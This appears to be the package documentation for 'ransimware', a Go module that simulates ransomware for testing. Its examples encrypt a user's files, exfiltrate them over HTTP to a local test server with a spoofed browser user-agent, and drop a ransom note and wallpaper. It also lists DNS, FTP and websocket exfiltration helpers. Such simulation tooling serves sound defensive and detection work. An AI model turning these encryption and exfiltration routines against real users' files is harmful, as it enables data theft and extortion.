README
¶
Ransimware
What is this?
This Go module allows you to simulate ransomware. Use https://ransomlook.io for ideas on domains and IOCs.
How to install
Open a terminal and run the following:
$ go get --ldflags "-s -w" --trimpath -u \
github.com/mjwhitta/ransimware
Usage
Minimal example:
package main
import (
"os"
"path/filepath"
rw "github.com/mjwhitta/ransimware"
)
func main() {
var e error
var home string
var sim *rw.Simulator
// Try to get home directory
if home, e = os.UserHomeDir(); e != nil {
panic(e)
}
// Create simulator with 32 worker threads
sim = rw.New(32)
// Since no encrypt function is defined, the default behavior is
// to do nothing
// Since no exfil function is defined, the default behavior is to
// do nothing
// Since no notify function is defined, the default behavior is to
// do nothing
// Target the user's Desktop directory
if e = sim.Target(filepath.Join(home, "Desktop")); e != nil {
panic(e)
}
// Run the simulator
if e = sim.Run(); e != nil {
panic(e)
}
}
More complex example:
package main
import (
"os"
"path/filepath"
"strings"
rw "github.com/mjwhitta/ransimware"
)
func main() {
var e error
var home string
var sim *rw.Simulator
// Try to get home directory
if home, e = os.UserHomeDir(); e != nil {
panic(e)
}
// Create simulator with 32 worker threads
sim = rw.New(32)
// Include interesting extensions
sim.Include(`\.(avi|mkv|mov|mp[34]|mpeg4?|ogg|wav)$`) // vids
sim.Include(`\.(bmp|gif|ico|jpe?g|png|tiff)$`) // imgs
sim.Include(`\.(docx|pptx|txt|xlsx|zip)$`) // docs
sim.Include(`\.(bat|ps1|xml)$`) // misc
// Ignore directories
sim.Exclude(`All\sUsers|AppData.Local|cache2.entries|Games`)
sim.Exclude(
`Local\sSettings|Low.Content\.IE5|Program(Data|\sFiles)`,
)
sim.Exclude(`Tor\sBrowser|User\sData.Default.Cache|Windows`)
// Ignore AnyConnect cache/config
sim.Exclude(`\.cisco|Cisco`)
// Ignore extensions
sim.Exclude(`\.(bin|dll|exe|in[fi]|lnk|ransimware|sys)$`)
// Set encryption method to AES using provided helper function
sim.Encrypt = rw.AESEncrypt("password")
// Set exfil method to be HTTP using provided helper function
sim.Exfil, e = rw.HTTPExfil(
"http://localhost:8080",
map[string]string{
"User-Agent": strings.Join(
[]string{
"Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"AppleWebKit/537.36 (KHTML, like Gecko)",
"Chrome/84.0.4147.105 Safari/537.36",
},
" ",
),
},
)
if e != nil {
panic(e)
}
// Notify user by changing wallpaper and leaving a ransom note,
// using the provided helper functions
sim.Notify = func() error {
rw.RansomNote(
filepath.Join(home, "Desktop", "ransomnote.txt"),
"This is a ransomware simulation.",
)()
rw.WallpaperNotify(
filepath.Join(home, "Desktop", "ransom.png"),
rw.DefaultPNG,
rw.DesktopStretch,
false,
)()
return nil
}
// Target the user's home directory
if e = sim.Target(home); e != nil {
panic(e)
}
// Run the simulator
if e = sim.Run(); e != nil {
panic(e)
}
}
Links
TODO
- Provide more helper functions
- FTP exfil
Documentation
¶
Index ¶
- Constants
- Variables
- func Base64Encode(path string, b []byte) ([]byte, error)
- func ExecuteScript(method string, clean bool, cmds ...string) (string, error)
- type EncryptFunc
- type ExfilFunc
- func DNSResolvedExfil(domain string) (ExfilFunc, error)
- func FTPExfil(dst, user, passwd string) (ExfilFunc, error)
- func FTPParallelExfil(dst, user, passwd string) (ExfilFunc, error)
- func HTTPExfil(dst string, headers map[string]string) (ExfilFunc, error)
- func WebsocketExfil(dst string, headers map[string]string, proxy ...string) (ExfilFunc, error)
- func WebsocketParallelExfil(dst string, headers map[string]string, proxy ...string) (ExfilFunc, error)
- type NotifyFunc
- type Simulator
Constants ¶
const ( DesktopCenter string = "0" DesktopFill string = "10" DesktopFit string = "6" DesktopSpan string = "22" DesktopStretch string = "2" DesktopTile string = "0" )
Desktop wallpaper style consts
const Version string = "0.27.2"
Version is the package version
Variables ¶
DefaultEncrypt is the default encryption behavior.
var DefaultExfil = func(path string, b []byte) error { return nil }
DefaultExfil is the default exfil behavior.
var DefaultNotify = func() error { return nil }
DefaultNotify is the default notify behavior.
var DefaultPNG []byte
DefaultPNG is an example PNG for use with WallpaperNotify().
Functions ¶
func Base64Encode ¶
Base64Encode will "encrypt" using base64, obvs.
Types ¶
type EncryptFunc ¶
EncryptFunc defines a function pointer that can be used to encrypt file contents before exfil.
func AESDecrypt ¶
func AESDecrypt(passwd string) EncryptFunc
AESDecrypt will return a function pointer to an EncryptFunc that actually decrypts using the specified password.
func AESEncrypt ¶
func AESEncrypt(passwd string) EncryptFunc
AESEncrypt will return a function pointer to an EncryptFunc that uses the specified password.
func RSADecrypt ¶
func RSADecrypt(priv *rsa.PrivateKey) EncryptFunc
RSADecrypt will return a function pointer to an EncryptFunc that actually decrypts using the specified private key. The private key is used to decrypt an OTP used with AES for a hybrid RSA+AES scheme.
func RSAEncrypt ¶
func RSAEncrypt(pub *rsa.PublicKey) EncryptFunc
RSAEncrypt will return a function pointer to an EncryptFunc that uses the specified public key. The public key is used to encrypt an OTP used with AES for a hybrid RSA+AES scheme.
type ExfilFunc ¶
ExfilFunc defines a function pointer that can be used to exil file contents.
func DNSResolvedExfil ¶
DNSResolvedExfil will return a function pointer to an ExfilFunc that exfils by sending DNS queries to the authoritative nameserver for the specified domain.
func FTPExfil ¶
FTPExfil will return a function pointer to an ExfilFunc that exfils via an FTP connection.
func FTPParallelExfil ¶
FTPParallelExfil will return a function pointer to an ExfilFunc that exfils via multiple FTP connections.
func HTTPExfil ¶
HTTPExfil will return a function pointer to an ExfilFunc that exfils via HTTP POST requests with the specified headers.
func WebsocketExfil ¶
WebsocketExfil will return a function pointer to an ExfilFunc that exfils via a websocket connection.
type NotifyFunc ¶
type NotifyFunc func() error
NotifyFunc defines a function pointer that can be used to notify the user of the ransom.
func RansomNote ¶
func RansomNote(path string, text ...string) NotifyFunc
RansomNote will return a function pointer to a NotifyFunc that appends the specified text to the specified file.
func WallpaperNotify ¶
func WallpaperNotify( img string, png []byte, fit string, clean bool, ) NotifyFunc
WallpaperNotify is a NotifyFunc that sets the background wallpaper.
type Simulator ¶
type Simulator struct {
Encrypt func(fn string, b []byte) ([]byte, error)
Exfil func(fn string, b []byte) error
ExfilFilenames bool
ExfilThreshold uint64
MaxFileSize int64
Notify func() error
OTP [32]byte
Threads int
WaitEvery time.Duration
WaitFor time.Duration
// contains filtered or unexported fields
}
Simulator is a struct containing all simulation metadata.
Source Files
Directories